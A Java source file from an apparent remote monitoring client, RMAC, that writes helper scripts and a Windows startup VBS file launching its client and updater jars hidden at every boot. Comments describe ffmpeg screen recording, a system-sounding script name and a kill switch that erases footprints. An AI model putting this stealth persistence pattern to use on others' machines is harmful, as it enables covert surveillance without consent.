package com.rmac.core;

import com.rmac.RMAC;
import com.rmac.utils.Constants;
import java.io.BufferedReader;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.PrintStream;
import java.lang.reflect.Field;
import java.nio.file.StandardCopyOption;
import java.util.HashMap;
import java.util.Map;
import java.util.Objects;
import java.util.stream.Collectors;
import lombok.extern.slf4j.Slf4j;
import org.apache.commons.text.StringSubstitutor;

/**
 * Verifies if all the script files exist and creates them otherwise.
 * <br><br>
 * Scripts are executable shell scripts that are all generated under runtime directory except
 * <i>SysIndexer.vbs</i>.
 * <br><br>
 * These scripts perform tasks that are otherwise not possible from within the running RMAC client
 * process.
 * <br><br>
 * For e.g. one such script is <code>kill.bat</code>, which acts as a kill switch, immediately
 * force-stopping this RMAC client, deleting the RMAC client executable and all of its working
 * directories, including itself.
 * <br><br>
 * <code>kill_ffmpeg.bat</code>
 * <br>
 * This script forcefully kills the ffmpeg.exe process responsible for screen recording.
 * <br><br>
 * <code>background.vbs</code>
 * <br>
 * This script executes other scripts/cli-programs as a background process.
 * <br><br>
 * <code>startrmac.bat</code>
 * <br>
 * This script starts the RMAC client executable as a background process.
 * <br><br>
 * <code>restartrmac.bat</code>
 * <br>
 * This script re-starts the RMAC client executable as a background process.
 * <br><br>
 * <code>SysIndexer.vbs</code>
 * <br>
 * This script is generated under the startup location and is responsible to start RMAC everytime
 * the host machine boots.
 * <br><br>
 * <code>kill.bat</code>
 * <br>
 * This script is a kill switch which removes all the footprints generated by this RMAC client.
 * <br>
 */
@Slf4j
public class ScriptFiles {

  public Thread thread;

  public ScriptFiles() {
    thread = new Thread(this::run, "ScriptFiles");
  }

  /**
   * Starts the script creation thread.
   */
  public void start() {
    this.thread.start();
  }

  /**
   * Creates all the script files.
   */
  public void run() {
    try {
      Map<String, String> values = new HashMap<>();
      for (Field field : Constants.class.getFields()) {
        values.put(field.getName(), (String) field.get(null));
      }
      StringSubstitutor substitutor = new StringSubstitutor(values);

      copyScript("kill_ffmpeg.bat");
      copyScript("background.vbs");
      copyScript("start_rmac.bat", substitutor);
      copyScript("restart_rmac.bat", substitutor);
      this.createSystemIndexer_Vbs();
      this.createKill_Bat();

      log.info("ScriptFiles successfully created");
    } catch (IOException | IllegalAccessException e) {
      log.error("ScriptFiles generation failed", e);
    }
  }

  /**
   * Validate script file <code>SysIndexer.vbs</code>
   *
   * @throws FileNotFoundException when verification/correction fails.
   */
  public void createSystemIndexer_Vbs() throws IOException {
    RMAC.fs.delete(Constants.STARTUP_LOCATION + "\\rmac.vbs");
    PrintStream systemindexer_vbs = RMAC.fs.getPrintStream(
        Constants.STARTUP_LOCATION + "\\rmac.vbs");
    systemindexer_vbs.println(
        "CreateObject(\"Wscript.Shell\").Run \"\"\"" + Constants.JRE_LOCATION
            + "\\bin\\java\"\" -jar \"\"" + Constants.CURRENT_LOCATION
            + "\\RMACClient.jar\"\" \"\"" + Constants.RUNTIME_LOCATION + "\"\"\", 0, False"
    );
    systemindexer_vbs.println(
        "CreateObject(\"Wscript.Shell\").Run \"\"\"" + Constants.JRE_LOCATION
            + "\\bin\\java\"\" -jar \"\"" + Constants.CURRENT_LOCATION
            + "\\RMACUpdater.jar\"\" \"\"" + Constants.RUNTIME_LOCATION + "\"\"\", 0, False"
    );
  }

  /**
   * Validate script file <code>kill.bat</code>
   *
   * @throws FileNotFoundException when verification/correction fails.
   */
  public void createKill_Bat() throws IOException {

  }

  public void copyScript(String script) {
    try (InputStream is = RMAC.fs.getResourceAsStream(RMAC.class, "/scripts/" + script)) {
      if (Objects.nonNull(is)) {
        RMAC.fs.copy(
            is, Constants.SCRIPTS_LOCATION + "\\" + script, StandardCopyOption.REPLACE_EXISTING
        );
      } else {
        log.error("Could not copy script: {}", script);
      }
    } catch (IOException e) {
      log.warn("Could not read script resource: {}", script, e);
    }
  }

  public void copyScript(String script, StringSubstitutor substitutor) {
    try (InputStream is = RMAC.fs.getResourceAsStream(RMAC.class, "/scripts/" + script)) {
      if (Objects.nonNull(is)) {
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String scriptContent = substitutor.replace(
            reader.lines().collect(Collectors.joining("\n"))
        );

        RMAC.fs
            .getPrintStream(Constants.SCRIPTS_LOCATION + "\\" + script)
            .println(scriptContent);

        reader.close();
      } else {
        log.error("Could not copy script: {}", script);
      }
    } catch (IOException e) {
      log.warn("Could not read script resource: {}", script, e);
    }
  }
}
